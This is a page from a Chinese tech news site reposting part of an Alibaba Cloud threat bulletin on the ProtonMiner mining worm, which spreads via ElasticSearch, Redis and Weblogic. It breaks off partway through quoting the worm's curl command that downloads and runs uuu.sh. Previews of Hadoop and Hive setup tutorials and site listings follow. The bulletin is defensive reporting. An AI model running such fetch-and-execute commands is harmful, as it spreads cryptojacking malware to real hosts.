威胁快报|ProtonMiner挖矿蠕虫扩大攻击面,加速传播
背景
近日,阿里云安全监测到一种挖矿蠕虫,正在互联网上加速传播。阿里云安全根据它使用ProtonMail邮箱地址作为矿池用户名的行为,将其命名为ProtonMiner。据分析,这种蠕虫与TrendMicro于2018年12月曾报导过的“利用ElasticSearch旧漏洞传播的蠕虫”非常相似,可能是同一团伙所为。但与先前报导不同的是,二月中旬,该挖矿蠕虫扩大了攻击面,从仅攻击ElasticSearch这一种服务,变为攻击包括Redis, Weblogic在内的多种服务,传播速度大大加快。
本文着重描写该挖矿僵尸网络的传播手法,并在文末列出了安全建议,以帮助用户避免遭受感染,或在已被感染的情况下进行清理。
感染路径
攻击者先控制被感染主机执行以下两条命令之一,从而下载并运行uuu.sh。
/bin/bash -c curl -fsSL h
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
hadoop搭建之hadoop安装
运行环境:系统:centos6.9jdk:jdk1.8.0_201 搭建版本:hadoop:hadoop-2.7.2 环境说明:集群环境至少需要 3 个节点(也就是 3 台服务器设备):1 个 Master,2 个 Slave,节点之间局域网连接 1、首先需要分别将三台服务器的opt目录改为qiqi用户的 chown -R qiqi: /opt/ 2、在opt目录下创建文件夹 modules 和 文件夹software,所有的安装包放在software下面,解压文件放在modules下面 3、准备工作,安装 JDK,在三台机器上配置 JDK 环境 tar -zvxf /opt/software/jdk-8u201-linux-x64.tar.gz -C /opt/modules/ 4、配置环境变量(切换到root目录下):vi /etc/profile # set java export JAVA_HOME=/opt/madules/jdk1.8.0_201 export JRE_HOME=$JAVA_HOME/jre export CLASSPATH=.:$JAVA_HOME/lib...
- 下一篇
hive连接eclipse
1、在Hadoop/etc/core-site.xml中新增 <property> <name>hadoop.proxyuser.qiqi.hosts</name> <value>主节点地址</value> </property> <property> <name>hadoop.proxyuser.qiqi.groups</name> <value>*</value> </property> 修改后重启Hadoop 测试:./beeline -u 'jdbc:hive2://localhost:10000/userdb' -n doutao 2、到hive/conf/hive-site.xml文件下,修改文件 <configuration> <property> <name>hive.server2.thrift.port</name> <value>10000</value&g...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- Docker使用Oracle官方镜像安装(12C,18C,19C)
- CentOS8编译安装MySQL8.0.19
- CentOS8,CentOS7,CentOS6编译安装Redis5.0.7
- SpringBoot2整合MyBatis,连接MySql数据库做增删改查操作
- SpringBoot2整合Redis,开启缓存,提高访问速度
- SpringBoot2配置默认Tomcat设置,开启更多高级功能
- Hadoop3单机部署,实现最简伪集群
- CentOS7,CentOS8安装Elasticsearch6.8.6
- CentOS6,7,8上安装Nginx,支持https2.0的开启
- SpringBoot2编写第一个Controller,响应你的http请求并返回结果